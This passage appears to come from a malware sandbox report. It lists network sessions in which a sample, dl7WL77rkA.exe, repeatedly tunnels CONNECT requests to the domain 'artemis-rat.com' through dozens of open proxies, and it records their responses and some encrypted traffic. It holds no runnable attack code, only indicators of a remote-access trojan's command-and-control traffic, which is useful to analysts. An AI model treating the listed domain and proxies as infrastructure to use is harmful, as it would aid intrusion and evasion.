Proxy-Connection: Keep-Alive


Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
161192.168.2.550251125.99.106.25031283876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp  Bytes transferred  Direction  Data
Mar 11, 2024 03:30:38.299532890 CET  223  OUT  CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:32:39.233697891 CET  39  IN  HTTP/1.1 200 Connection established
Mar 11, 2024 03:32:42.244882107 CET  39  IN  HTTP/1.1 200 Connection established
Mar 11, 2024 03:32:48.380086899 CET  39  IN  HTTP/1.1 200 Connection established
Mar 11, 2024 03:33:00.668298006 CET  39  IN  HTTP/1.1 200 Connection established
Mar 11, 2024 03:33:24.735054970 CET  39  IN  HTTP/1.1 200 Connection established


Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
162192.168.2.550416172.67.254.127803876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp  Bytes transferred  Direction  Data
Mar 11, 2024 03:30:38.307894945 CET  223  OUT  CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:38.462846041 CET  316  IN  HTTP/1.1 400 Bad Request
Server: cloudflare
Date: Mon, 11 Mar 2024 02:30:38 GMT
Content-Type: text/html
Content-Length: 155
Connection: close
CF-RAY: -
Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
163192.168.2.5502934.144.161.159803876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp  Bytes transferred  Direction  Data
Mar 11, 2024 03:30:38.320682049 CET  223  OUT  CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:39.420471907 CET  59  IN  HTTP/1.1 200 Connection Established
Proxy-agent: nginx
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.348474979 CET258INData Raw: 16 03 03 00 ca 04 00 00 c6 00 00 fd 1f 00 c0 ea 0e 0f 5b c6 70 51 f5 96 8e 45 a4 8d 44 96 1f 73 64 5f c4 0c 20 dc 67 70 5c 10 33 2f a6 9b 37 d1 74 e8 83 82 63 aa b1 c1 04 08 77 b5 c6 61 d8 61 98 0e 49 14 f9 01 b2 86 25 0f 46 bf e5 90 df 12 51 e7
                                                                                                                                                                                                                                                            Data Ascii: [pQEDsd_ gp\3/7tcwaaI%FQ^"NN>O.JLRrG#"deF[70S%Jiaa}zq2Q*kku4dS11s{+K 7'p(9Of}`Qkx7>
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.349906921 CET252OUTData Raw: 17 03 03 00 f7 00 00 00 00 00 00 00 01 11 9f 5b 06 74 5e b0 b2 5e 2f c2 85 27 5f d4 ba 2e 1e d2 04 44 d7 be 1e 44 99 e0 dc 10 f0 69 5f 62 31 44 62 d6 e3 c3 f0 e4 cd 7f 76 fb 60 56 d5 fc 8d 58 d4 04 14 15 8f bc 46 47 9b 74 0c 8c f1 17 7c ca c6 95
                                                                                                                                                                                                                                                            Data Ascii: [t^^/'_.DDi_b1Dbv`VXFGt|=B4I{L+w7HmO`.}Xu|B7E .<nT}yF|In9+xlIlC`gdSWIlCJRH.RrGT8!" e+
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.695019007 CET1286INData Raw: 17 03 03 05 71 00 00 00 00 00 00 00 01 b7 31 23 ac 8f 77 02 dc 3f 5d 3b 75 e3 7d bb cc 31 40 4b 95 4a f6 3c 4e 69 da e9 75 d9 ae 8f d2 64 4f b2 31 92 8f 76 23 4b 5a 0a fb f3 6f 24 fa ee 66 ee 79 af 56 de 0d 2b be c4 f8 b1 d9 9d c8 69 8e 89 67 77
                                                                                                                                                                                                                                                            Data Ascii: q1#w?];u}1@KJ<NiudO1v#KZo$fyV+igwn'dU6`7AXp.k;d"Pwk:ii,j sffBj2Vx@$u<~m=^*)PrP,?]FrdD2S_w"btj(/oQbED
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.695080996 CET1286INData Raw: a4 69 0f ea c1 02 e1 66 38 63 3f 85 26 90 ca dc 0f bb a2 88 c3 a1 d1 39 7f e5 a4 b4 3f 96 af dc bb 86 e9 9b 53 db 3c 96 0b d9 1c 6d 2c d0 e4 f5 7f 74 4d 3e ad 3d 11 fc d4 21 8f f1 90 71 91 5d a2 c9 35 26 7c 3e bd cf 23 9d 69 71 c8 b8 4c 30 9b 5a
                                                                                                                                                                                                                                                            Data Ascii: if8c?&9?S<m,tM>=!q]5&|>#iqL0Z>04yhFx$_.tTqk-wR+V$apguQqh$9QmX)*azhT~w4q|"q1VPSjtv+$m


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            164192.168.2.55038023.152.40.1550503876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.321508884 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:32:38.172982931 CET39INHTTP/1.1 200 Connection established
                                                                                                                                                                                                                                                            Mar 11, 2024 03:32:38.833858013 CET39INHTTP/1.1 200 Connection established
                                                                                                                                                                                                                                                            Mar 11, 2024 03:32:39.509538889 CET39INHTTP/1.1 200 Connection established
                                                                                                                                                                                                                                                            Mar 11, 2024 03:32:40.821541071 CET39INHTTP/1.1 200 Connection established
                                                                                                                                                                                                                                                            Mar 11, 2024 03:32:43.506450891 CET39INHTTP/1.1 200 Connection established
                                                                                                                                                                                                                                                            Mar 11, 2024 03:32:48.881645918 CET39INHTTP/1.1 200 Connection established
                                                                                                                                                                                                                                                            Mar 11, 2024 03:32:59.381218910 CET39INHTTP/1.1 200 Connection established
                                                                                                                                                                                                                                                            Mar 11, 2024 03:33:21.649727106 CET39INHTTP/1.1 200 Connection established


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            165192.168.2.55034754.248.238.110803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.329782009 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.595454931 CET116INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:38 GMT
                                                                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                                                                            Content-Type: text/plain
                                                                                                                                                                                                                                                            Content-Length: 0


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            166192.168.2.54976772.195.34.35273603876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.332847118 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            167192.168.2.550437172.67.187.242803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.332849979 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.487535954 CET316INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:38 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            168192.168.2.550274139.99.197.231283876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.333419085 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.139238119 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.357997894 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.806682110 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:49.327191114 CET39INHTTP/1.1 200 Connection established


Session IDSource IPSource PortDestination IPDestination PortPIDProcess
169192.168.2.550281128.199.221.91216053876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:38.335499048 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


Session IDSource IPSource PortDestination IPDestination PortPIDProcess
170192.168.2.550327203.218.172.22580803876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:38.348542929 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:38.661139011 CET | 326 | IN | HTTP/1.1 400 Bad Request
Server: nginx
Date: Mon, 11 Mar 2024 02:30:38 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 166
Connection: close
Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


Session IDSource IPSource PortDestination IPDestination PortPIDProcess
171192.168.2.54977250.227.218.17256783876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:38.348545074 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


Session IDSource IPSource PortDestination IPDestination PortPIDProcess
172192.168.2.55039738.162.30.15131283876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:38.349592924 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:40.798530102 CET | 111 | IN | HTTP/1.1 407 Proxy Authentication Required
Proxy-Authenticate: Basic realm=""
Data Raw: 50 72 6f 78 79 20 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 52 65 71 75 69 72 65 64
Data Ascii: Proxy Authentication Required


Session IDSource IPSource PortDestination IPDestination PortPIDProcess
173192.168.2.550298182.52.229.16580803876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:38.354543924 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:39.091219902 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:40.702224016 CET | 19 | IN | HTTP/1.1 200 OK


Session IDSource IPSource PortDestination IPDestination PortPIDProcess
174192.168.2.55040392.204.134.38529293876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:38.363325119 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:38.920433044 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:39.623704910 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:41.202022076 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:44.092750072 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:46.905401945 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:49.905189991 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:55.592691898 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


Session IDSource IPSource PortDestination IPDestination PortPIDProcess
175192.168.2.54973931.42.184.146577523876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:38.375863075 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            176192.168.2.550364153.127.194.62803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.379909039 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.014198065 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
Mar 11, 2024 03:31:04.595834970 CET  806  IN  HTTP/1.1 500 Internal Server Error
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:31:04 GMT
                                                                                                                                                                                                                                                            Server: Apache/2.4.52 (Ubuntu)
                                                                                                                                                                                                                                                            Content-Length: 614
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>500 Internal Server Error</title></head><body><h1>Internal Server Error</h1><p>The server encountered an internal error ormisconfiguration and was unable to completeyour request.</p><p>Please contact the server administrator at webmaster@localhost to inform them of the time this error occurred, and the actions you performed just before this error.</p><p>More information about this error may be availablein the server error log.</p><hr><address>Apache/2.4.52 (Ubuntu) Server at artemis-rat.com Port 443</address></body></html>
Mar 11, 2024 03:31:09.411199093 CET  806  IN  HTTP/1.1 500 Internal Server Error
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:31:04 GMT
                                                                                                                                                                                                                                                            Server: Apache/2.4.52 (Ubuntu)
                                                                                                                                                                                                                                                            Content-Length: 614
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>500 Internal Server Error</title></head><body><h1>Internal Server Error</h1><p>The server encountered an internal error ormisconfiguration and was unable to completeyour request.</p><p>Please contact the server administrator at webmaster@localhost to inform them of the time this error occurred, and the actions you performed just before this error.</p><p>More information about this error may be availablein the server error log.</p><hr><address>Apache/2.4.52 (Ubuntu) Server at artemis-rat.com Port 443</address></body></html>
Mar 11, 2024 03:31:15.043149948 CET  806  IN  HTTP/1.1 500 Internal Server Error
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:31:04 GMT
                                                                                                                                                                                                                                                            Server: Apache/2.4.52 (Ubuntu)
                                                                                                                                                                                                                                                            Content-Length: 614
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>500 Internal Server Error</title></head><body><h1>Internal Server Error</h1><p>The server encountered an internal error ormisconfiguration and was unable to completeyour request.</p><p>Please contact the server administrator at webmaster@localhost to inform them of the time this error occurred, and the actions you performed just before this error.</p><p>More information about this error may be availablein the server error log.</p><hr><address>Apache/2.4.52 (Ubuntu) Server at artemis-rat.com Port 443</address></body></html>
Mar 11, 2024 03:31:26.307045937 CET  806  IN  HTTP/1.1 500 Internal Server Error
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:31:04 GMT
                                                                                                                                                                                                                                                            Server: Apache/2.4.52 (Ubuntu)
                                                                                                                                                                                                                                                            Content-Length: 614
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>500 Internal Server Error</title></head><body><h1>Internal Server Error</h1><p>The server encountered an internal error ormisconfiguration and was unable to completeyour request.</p><p>Please contact the server administrator at webmaster@localhost to inform them of the time this error occurred, and the actions you performed just before this error.</p><p>More information about this error may be availablein the server error log.</p><hr><address>Apache/2.4.52 (Ubuntu) Server at artemis-rat.com Port 443</address></body></html>
Mar 11, 2024 03:31:49.603123903 CET  806  IN  HTTP/1.1 500 Internal Server Error
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:31:04 GMT
                                                                                                                                                                                                                                                            Server: Apache/2.4.52 (Ubuntu)
                                                                                                                                                                                                                                                            Content-Length: 614
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>500 Internal Server Error</title></head><body><h1>Internal Server Error</h1><p>The server encountered an internal error ormisconfiguration and was unable to completeyour request.</p><p>Please contact the server administrator at webmaster@localhost to inform them of the time this error occurred, and the actions you performed just before this error.</p><p>More information about this error may be availablein the server error log.</p><hr><address>Apache/2.4.52 (Ubuntu) Server at artemis-rat.com Port 443</address></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            177192.168.2.55030720.219.182.5931293876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp  Bytes transferred  Direction  Data
Mar 11, 2024 03:30:38.397371054 CET  223  OUT  CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:38.791773081 CET  39  IN  HTTP/1.1 200 Connection established


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            178192.168.2.549761161.97.163.52641093876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp  Bytes transferred  Direction  Data
Mar 11, 2024 03:30:38.397419930 CET  223  OUT  CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:41.514318943 CET  223  OUT  CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            179192.168.2.55036851.178.231.3480803876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp  Bytes transferred  Direction  Data
Mar 11, 2024 03:30:38.397898912 CET  223  OUT  CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            180192.168.2.550464172.67.182.60803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.398544073 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.553944111 CET316INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:38 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
